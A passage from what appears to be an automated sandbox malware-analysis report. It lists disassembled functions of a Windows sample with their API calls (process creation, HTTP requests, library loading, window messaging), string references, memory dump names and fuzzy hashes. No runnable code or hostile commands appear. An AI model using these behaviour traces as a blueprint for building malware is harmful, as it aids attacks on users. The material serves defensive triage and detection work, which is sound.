                                                                                                                                                                                                                                                                                        • ___scrt_fastfail.LIBCMT ref: 00F20457
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F20413: __onexit.LIBCMT ref: 00F20419
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • kernel32.dll, xrefs: 00F204A3
                                                                                                                                                                                                                                                                                        • InitializeConditionVariable, xrefs: 00F204B8
                                                                                                                                                                                                                                                                                        • SleepConditionVariableCS, xrefs: 00F204C4
                                                                                                                                                                                                                                                                                        • WakeAllConditionVariable, xrefs: 00F204D2
                                                                                                                                                                                                                                                                                        • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00F20492
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                                                                                                                                                                                                        • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                                                                                                                        • API String ID: 66158676-1714406822
                                                                                                                                                                                                                                                                                        • Opcode ID: a594cee29e0b573973ff2cbe9e7715a2ff3a41f9b3f1c29e04dac71e175dcfcf
                                                                                                                                                                                                                                                                                        • Instruction ID: a9f1079362847167e1959223114de116086d21584a73f2bc229c637b37442ac8
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a594cee29e0b573973ff2cbe9e7715a2ff3a41f9b3f1c29e04dac71e175dcfcf
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CE210533A417287BE7206BB4BC06F6977A8EB05B61F14012BF905D3292DFB4DC40BA52
                                                                                                                                                                                                                                                                                        Function 00F63A43 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _wcslen
                                                                                                                                                                                                                                                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                                                                                                                                                        • API String ID: 176396367-1603158881
                                                                                                                                                                                                                                                                                        • Opcode ID: c44abd51cf83c55caec8fc1abc9d8390bc9477403f1a2994f5e83e42ded288a1
                                                                                                                                                                                                                                                                                        • Instruction ID: bf6cfe9d08a2ecdbc18a56fd027e13049719f2264c736ad25b9a539f14ca37a9
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c44abd51cf83c55caec8fc1abc9d8390bc9477403f1a2994f5e83e42ded288a1
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 00E1D532E04516ABCB189FB4C851BEDFBB4BF54720F104119E456F7251DB30AE89B7A0
                                                                                                                                                                                                                                                                                        Function 00F74F05 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CharLowerBuffW.USER32(00000000,00000000,00F9DCD0), ref: 00F74F6C
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F74F80
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F74FDE
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F75039
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F75084
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F750EC
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F1FD52: _wcslen.LIBCMT ref: 00F1FD5D
                                                                                                                                                                                                                                                                                        • GetDriveTypeW.KERNEL32(?,00FC7C10,00000061), ref: 00F75188
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                                                                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                                                                                                                                        • API String ID: 2055661098-1000479233
                                                                                                                                                                                                                                                                                        • Opcode ID: 371887af8bef4a78e81d56ef1cb4c842b65dfc73c9603b5ea43205892c15d66d
                                                                                                                                                                                                                                                                                        • Instruction ID: 473f8fa430a4a41917cc92f93067b76f82a3ad7e11e5f3a3763fe78ae95901ea
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 371887af8bef4a78e81d56ef1cb4c842b65dfc73c9603b5ea43205892c15d66d
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 47B1D631A087029FC710DF28D891A6AB7E5AF94B20F50891EF49987291D7B4DC44EB93
                                                                                                                                                                                                                                                                                        Function 00F8BA59 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F8BBF8
                                                                                                                                                                                                                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F8BC10
                                                                                                                                                                                                                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F8BC34
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F8BC60
                                                                                                                                                                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F8BC74
                                                                                                                                                                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F8BC96
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F8BD92
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F70F4E: GetStdHandle.KERNEL32(000000F6), ref: 00F70F6D
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F8BDAB
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F8BDC6
                                                                                                                                                                                                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00F8BE16
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 00F8BE67
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00F8BE99
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F8BEAA
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F8BEBC
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F8BECE
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00F8BF43
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2178637699-0
                                                                                                                                                                                                                                                                                        • Opcode ID: c0f7bc41dc2ebb87b6140fa2f3b2235f5ab7e0f3b17450a9b1b2ecc7053050c6
                                                                                                                                                                                                                                                                                        • Instruction ID: 96f21e86b7719053a017cca2442ee8f4469e6ef96cabb49f9000574d61cb2158
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c0f7bc41dc2ebb87b6140fa2f3b2235f5ab7e0f3b17450a9b1b2ecc7053050c6
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 66F1B072A04340DFD714EF24C891BAABBE1BF85320F18855DF4858B2A2CB75EC45EB52
                                                                                                                                                                                                                                                                                        Function 00F84A46 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 478libraryloaderCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00F9DCD0), ref: 00F84B18
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00F84B2A
                                                                                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,00F9DCD0), ref: 00F84B4F
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00F9DCD0), ref: 00F84B9B
                                                                                                                                                                                                                                                                                        • StringFromGUID2.OLE32(?,?,00000028,?,00F9DCD0), ref: 00F84C05
                                                                                                                                                                                                                                                                                        • SysFreeString.OLEAUT32(00000009), ref: 00F84CBF
                                                                                                                                                                                                                                                                                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00F84D25
                                                                                                                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 00F84D4F
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                                                                                                                                                                                                                                        • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                                                                                                                                                        • API String ID: 354098117-199464113
                                                                                                                                                                                                                                                                                        • Opcode ID: 786b349e90760031a233a9fd70aa1715931e7f531423d87e23364f73c1f69a5c
                                                                                                                                                                                                                                                                                        • Instruction ID: d4fe9810c62f12b91b2f4b823135dd45a55ce536538c1f1bea3ad4146771aabf
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 786b349e90760031a233a9fd70aa1715931e7f531423d87e23364f73c1f69a5c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 26122B71A0021AEFDB14DF94C884EAABBB9FF85314F248098E9059B251D735FD46DBA0
                                                                                                                                                                                                                                                                                        Function 00F0381F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetMenuItemCount.USER32(00FD29C0), ref: 00F43F72
                                                                                                                                                                                                                                                                                        • GetMenuItemCount.USER32(00FD29C0), ref: 00F44022
                                                                                                                                                                                                                                                                                        • GetCursorPos.USER32(?), ref: 00F44066
                                                                                                                                                                                                                                                                                        • SetForegroundWindow.USER32(00000000), ref: 00F4406F
                                                                                                                                                                                                                                                                                        • TrackPopupMenuEx.USER32(00FD29C0,00000000,?,00000000,00000000,00000000), ref: 00F44082
                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00F4408E
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                                                                        • API String ID: 36266755-4108050209
                                                                                                                                                                                                                                                                                        • Opcode ID: 35b083834651750857d82dd916579b7114c590f6b285d14eb20d41b4e39bbeeb
                                                                                                                                                                                                                                                                                        • Instruction ID: 4643ef8c73b3f84cb4cdcfaae56ed626a883d2b84e858e56730c81fd81c938f6
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 35b083834651750857d82dd916579b7114c590f6b285d14eb20d41b4e39bbeeb
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7E710531A44215BAFB258F28DC49FAABFA8FF05374F244206F914661D0C7B5AD14F790
                                                                                                                                                                                                                                                                                        Function 00F97711 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • DestroyWindow.USER32(00000000,?), ref: 00F97823
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F08577: _wcslen.LIBCMT ref: 00F0858A
                                                                                                                                                                                                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00F97897
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00F978B9
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F978CC
                                                                                                                                                                                                                                                                                        • DestroyWindow.USER32(?), ref: 00F978ED
                                                                                                                                                                                                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00F00000,00000000), ref: 00F9791C
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F97935
                                                                                                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00F9794E
                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 00F97955
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00F9796D
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00F97985
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F02234: GetWindowLongW.USER32(?,000000EB), ref: 00F02242
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                                                                                                                                                                                                        • String ID: 0$tooltips_class32
                                                                                                                                                                                                                                                                                        • API String ID: 2429346358-3619404913
                                                                                                                                                                                                                                                                                        • Opcode ID: 47ffdc47c6bb3fa67f84416cef4a25963783de515e15c80dee998daadb9b60a1
                                                                                                                                                                                                                                                                                        • Instruction ID: 55c01327ee7784747b48d7802dde015c8eb8751d530acc9dc1decf9c7107dc54
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 47ffdc47c6bb3fa67f84416cef4a25963783de515e15c80dee998daadb9b60a1
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 16718A70508344AFEB25EF58CC48FAABBE9FB89314F14045EF98587261C770E906EB52
                                                                                                                                                                                                                                                                                        Function 00F99B7A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00F024B0
                                                                                                                                                                                                                                                                                        • DragQueryPoint.SHELL32(?,?), ref: 00F99BA3
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F980AE: ClientToScreen.USER32(?,?), ref: 00F980D4
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F980AE: GetWindowRect.USER32(?,?), ref: 00F9814A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F980AE: PtInRect.USER32(?,?,?), ref: 00F9815A
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00F99C0C
                                                                                                                                                                                                                                                                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00F99C17
                                                                                                                                                                                                                                                                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00F99C3A
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00F99C81
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00F99C9A
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00F99CB1
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00F99CD3
                                                                                                                                                                                                                                                                                        • DragFinish.SHELL32(?), ref: 00F99CDA
                                                                                                                                                                                                                                                                                        • DefDlgProcW.USER32(?,00000233,?,00000000), ref: 00F99DCD
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                                                                                                                                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                                                                                                                                                                        • API String ID: 221274066-3440237614
                                                                                                                                                                                                                                                                                        • Opcode ID: 5493a7467b2048b405640357db42e27f2362e09e1350260ecfd0c03effd58e5e
                                                                                                                                                                                                                                                                                        • Instruction ID: 78b397954caf4be7fa07a08b8454de9a4cd895288acb24f04c05aa23528845e4
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5493a7467b2048b405640357db42e27f2362e09e1350260ecfd0c03effd58e5e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BD61A971108305AFD701EF64DC85EAFBBE9EF88750F10091EF591921A1DB709A09EB52
                                                                                                                                                                                                                                                                                        Function 00F7CEBB Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F7CEF5
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00F7CF08
                                                                                                                                                                                                                                                                                        • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00F7CF1C
                                                                                                                                                                                                                                                                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00F7CF35
                                                                                                                                                                                                                                                                                        • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00F7CF78
                                                                                                                                                                                                                                                                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00F7CF8E
                                                                                                                                                                                                                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F7CF99
                                                                                                                                                                                                                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00F7CFC9
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00F7D021
                                                                                                                                                                                                                                                                                        • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00F7D035
                                                                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00F7D040
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3800310941-3916222277
                                                                                                                                                                                                                                                                                        • Opcode ID: 177673f7ad218b8f15f075feab732d37cb5007c45333ae414d25181df6bdb9d3
                                                                                                                                                                                                                                                                                        • Instruction ID: 6deece55af63f91efd70488c763221b358bf2b2963a35bcd8bf27d65521309f2
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 177673f7ad218b8f15f075feab732d37cb5007c45333ae414d25181df6bdb9d3
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6C517CB1900608BFDB219FA0CD88AAB7BBCFF08754F50841FF94996250D734D945BBA2
                                                                                                                                                                                                                                                                                        Function 00F98FCB Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00F966D6,?,?), ref: 00F98FEE
                                                                                                                                                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00F966D6,?,?,00000000,?), ref: 00F98FFE
                                                                                                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00F966D6,?,?,00000000,?), ref: 00F99009
